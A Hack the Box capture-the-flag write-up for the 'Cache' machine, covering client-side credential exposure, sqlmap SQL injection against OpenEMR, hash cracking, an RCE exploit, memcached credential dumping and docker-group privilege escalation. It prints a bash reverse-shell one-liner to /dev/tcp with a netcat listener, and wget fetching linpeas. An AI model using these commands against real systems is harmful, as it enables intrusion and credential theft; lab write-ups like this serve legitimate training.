Introduction

IP: 10.10.10.172 Difficulty: Easy

This is my write-up for the Hack the Box machine Cache.

Initial nmap Scan

Running the inital nmap scan:

nmap -sV -sC -p- -oN nmap 10.10.10.188

Yielded the following results:

Nmap Scan

From these results, it shows that there are two ports open

Port 80 apache web server

Enumerating the Web Server

Navigating to the web server, I am presented with this webpage

Homepage

I navigate through the webpage to try find some useful information

Login Page

Login Page

The login page presents me with a login form, I tried to use some default credentials here to no success. I noticed that the website shows what input is incorrect - which would be helpful when trying to brute-force usernames and passwords.

My next step was to capture this login request with BurpSuite. To my surprise there was no post request. And with the username and password input having to be validated, the credentials must be compared locally (on my browser). To verify this, I check Firefox's debugger and there was a file called functionality.js

Functionality.js

It looks like the webpage was validating the user input locally and I am presented with the plaintext username and password

USERNAME - ash

PASSWORD - H@v3_fun

Sure enough, the credentials worked.

Under Construction

Sadly, there was nothing beyond the login page apart from an ‘Under Construction’ notice. Perhaps the credentials will be useful for later.

About

Author Page

On here, there seems to be little information, however Ash mentioned another project of his ‘HMS’

This led me to try edit my /etc/hosts file to add cache.htb and HMS.htb to it.

Hosts file

In the hopes of it working, it did.

OpenEMR portal

I checked the source code to see if any version details, or information were revealed. On the main page, there was the copyright notice which dated to 2018.

NB - I noticed that using other methods like fuzzing were less “lucky” to get the same result

After some time I came across a video persisting of SQL injection: OpenEMR Simulated Attack

Gaining Access to OpenEMR

Explaining the steps in the video in context with Cache:

  1. Navigate to HMS.htb/portal/add_edit_event_user/php?eid='. I knew it was vulnerable when the following webpage was displayed:

SQL Error

  1. Open BurpSuite and reload the page to capture the request
GET /portal/add_edit_event_user.php?eid=%27 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=cdghrt7lln9k1shbvtdmdkjr6n; OpenEMR=djap8b3iolchp81ipr95nj8il
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

  1. Copy the request into a file - removing the %27 on the first line of the request, and replacing it with a ‘1’ - this makes the request valid so SQLmap can work effectively.

  2. Use SQLmap with the following command: sqlmap -r <request file> --threads 10 --dbs

SQL Map

sqlmap -r openemr.req --threads 10 --tables Provides us with a list of tables, searching through here, we see the following tables:

SQL Tables

Dumping the data of each table, users_secure contained some very interesting data

SQL Tables

USERNAME - openemr_admin

HASH - $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.

### Cracking with John

First, copy the hash into a file john -w=/path/to/rockyou.txt hashfile followed by: john --show hashfile

Cracked Password

Now we have the password: xxxxxx

Successful Log in

And successfully Logged in.

RCE Exploit

After gaining access to OpenEMR, I found an exploit that matched with the version of OpenEMR. Which can be found on exploit db HERE

This lets me remotely execute a single command from the server.

For this to be effective, I searched for reverse shell bash one-liners, and I come across this:

bash -i >& /dev/tcp/your_ip/your_port 0>&1

Set up a netcat listener and execute the rce exploit

nc -lvnp 7777

python rce.py http://HMS.htb -u openemr_admin -p xxxxxx -c "bash -i >& /dev/tcp/yourip/7777 0>&1"

Reverse Shell

I get a shell, running as www-data

Gaining User 1

The shell wasn't very stable at the moment so I tried spawn a TTY Shell, I do this by using which python3, which let me know that python3 was installed.

To spawn a TTY shell with python3 I used:

python3 -c 'import pty; pty.spawn("/bin/sh")'

I navigate to the /home/ directory, and noticed that ‘ash’ was present.

Using the password I grabbed from the functionality.js I switched user: SU

Navigating to the ash directory I got user.txt

Gaining User 2

I downloaded linpeas.sh to my machine and used python -m SimpleHTTPserver 80 to host the file and then download it from the box.

wget <yourip>:80/linpeas.sh

chmod +x linpeas.sh

Whilst going through the results of linpeas, I noticed ‘/usr/bin/memcached’ running on port 11211.

it was running internally, so I decided to telnet into it.

telnet 127.0l0.1 11211

Using the following website, I learned how to exploit the server HERE

stats slabs

stats slabs

stats cachedump 1 0

Dumping the cache, we see a user and password item. To view these, we use get <item>

get user get user get passwd stats slabs

So now we have another set of credentials!

USER - luffy

PASSWORD - 0n3_p1ec3

I then switch user to luffy

switch user luffy

Running id I find that luffy is part of the docker group

luffy id

I found the docker binary in /usr/bin/ an decided to check gtfobins. And foundDockeer gtfobin docker gtfobin

I check shell and find the command : docker shell

Running this command shows that the alpine keyword is the image name , which was not present on this machine, so I run docker images to find the images on the machine. This showed that an ubuntu image was on the system.

So, running: Exploit Gave me root!

Reading /root/root.txt gives me the root flag!